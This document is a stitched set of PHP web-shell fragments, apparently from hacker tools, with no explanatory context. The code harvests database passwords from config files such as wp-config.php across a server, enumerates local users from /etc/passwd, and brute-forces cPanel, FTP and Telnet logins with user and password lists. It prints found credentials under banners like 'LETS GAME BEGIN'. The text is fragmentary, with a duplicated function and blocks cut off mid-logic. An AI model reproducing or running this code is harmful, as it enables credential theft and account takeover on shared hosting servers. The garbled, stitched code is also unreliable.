function read_dir($path, $username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "{$path}{$file}"; if ($file != '.' and $file != '..') { if (is_readable($fpath)) { $dr = "{$fpath}/"; if (is_dir($dr)) { read_dir($dr, $username); } else { if ($file == 'config.php' or $file == 'config.inc.php' or $file == 'db.inc.php' or $file == 'connect.php' or $file == 'wp-config.php' or $file == 'var.php' or $file == 'configure.php' or $file == 'db.php' or $file == 'db_connect.php') { $pass = get_pass($fpath); if ($pass != '') { echo "[+] {$fpath}\n{$pass}\n"; ftp_check($username, $pass); } } } } } } } }
if (empty($pass) && $_REQUEST['bruteforce'] != "true") { print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; } $userlist = explode("\n", $users); $passlist = explode("\n", $pass); print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n LETS GAME BEGIN ;) ...</font></b><br><br>"; if (isset($_POST['connect_timeout'])) { $connect_timeout = $_POST['connect_timeout']; } if ($cracktype == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password) { $purepass = trim($password); ftp_check($target, $pureuser, $purepass, $connect_timeout); } } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if ($cracktype == "cpanel2") { $cpanel_port = "23"; } else { $cpanel_port = "2082"; } foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">\r\n Please put some good password to crack user {$pureuser} :( ... </font></b>"; if ($_POST['bruteforce'] == "true") { echo " bruteforcing .."; echo "<br>";
exit; } elseif (curl_errno($ch) == 0) { print "<b>[ user@alturks.com ]# </b>\r\n<b>Attacking has been done , found username , <font color='#FF0000'> {$user} </font> and password , \r\n<font color='#FF0000'> {$pass} </font></b><br>"; } curl_close($ch); } if (isset($submit) && !empty($submit)) { $userlist = explode("\n", $users); $passlist = explode("\n", $pass); print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>"; foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password) { $_pass = trim($password); if ($option == "ftp") { ftp_check($target, $_user, $_pass, $connect_timeout); } if ($option == "cpanel") { cpanel_check($target, $_user, $_pass, $connect_timeout); } } } } } elseif ($page == 'users') { echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>"; echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="' . htmlspecialchars($file) . '"><input type="submit" name="hardstylez" value="grab !"></form>'; $file = $_POST['file']; $level = 0; if (!file_exists("file:")) { @mkdir("file:"); }
function cpanel_crack() { set_time_limit(0); global $os; echo "<div id=result>"; $cpanel_port = "2082"; $connect_timeout = 5; if (!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) { ?> <center> <form method=post> <table class=tbl> <tr> <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td> </tr> <tr> <td align=center>User names</td><td align=center>Password</td> </tr> <tr> <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php if ($os != "win") { if (@file('/etc/passwd')) { $users = file('/etc/passwd'); foreach ($users as $user) { $user = explode(':', $user); echo $user[0] . "\n"; } } else { $temp = ""; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join(':', $uid) . "\n"; } } $temp = trim($temp); if ($file5 = fopen("test.txt", "w")) { fputs($file5, $temp); fclose($file5); $file = fopen("test.txt", "r"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\\/(.*?)\\:\\//s', $s, $matches); $matches = str_replace("home/", "", $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo $matches; } fclose($file); } } } ?> </textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td> </tr> <tr> <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td> </tr> <tr> <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td> </tr> <tr> <td align=center colspan=2><input type="submit" value=" Go " class=but></td> </tr> </table> </form> </center> <?php } else { if (empty($_POST['username']) || empty($_POST['password'])) { echo "<center>Please Enter The Users or Password List</center>"; } else { $userlist = explode("\n", $_POST['username']); $passlist = explode("\n", $_POST['password']); if ($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password) { $purepass = trim($password); ftp_check($_POST['target'], $pureuser, $purepass, $connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if ($cracktype == "telnet") { $cpanel_port = "23"; } else { $cpanel_port = "2082"; } foreach ($userlist as $user) { $pureuser = trim($user); echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>\n\t\t\t\t\t\tProcessing user {$pureuser} ...</font></b><br><br>"; foreach ($passlist as $password) { $purepass = trim($password); cpanel_check($_POST['target'], $pureuser, $purepass, $connect_timeout); } } } } } echo "</div>"; }
function read_dir($path, $username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "{$path}{$file}"; if ($file != '.' and $file != '..') { if (is_readable($fpath)) { $dr = "{$fpath}/"; if (is_dir($dr)) { read_dir($dr, $username); } else { if ($file == 'config.php' or $file == 'configuration.php' or $file == 'wp-config.php' or $file == 'config.inc.php' or $file == 'database.php' or $file == 'conf.php' or $file == 'settings.php' or $file == 'setting.php' or $file == 'inc.php' or $file == 'corn.php' or $file == 'configs.php' or $file == 'konfig.php' or $file == 'dbconf.php' or $file == 'koneksi.php' or $file == 'dbconfig.php' or $file == 'db.inc.php' or $file == 'db_connect.php' or $file == 'dbconnect.php' or $file == 'db-connect.php' or $file == 'configure.php' or $file == 'global.php' or $file == 'connect.php' or $file == 'db.php' or $file == 'conf_db.php' or $file == 'database.inc.php' or $file == 'database.php' or $file == 'connection.php' or $file == 'connections.php' or $file == 'configure.class.php' or $file == 'config.class.php' or $file == 'configuration.class.php' or $file == 'db.class.php' or $file == 'file_manager.php' or $file == 'LocalSettings.php' or $file == 'filemanager.php' or $file == 'manager.php' or $file == 'managers.php' or $file == 'connect.inc.php' or $file == 'dbconnect.inc.php') { $pass = get_pass($fpath); if ($pass != '') { echo "[+] {$fpath}\n{$pass}\n"; ftp_check($username, $pass); } } } } } } } }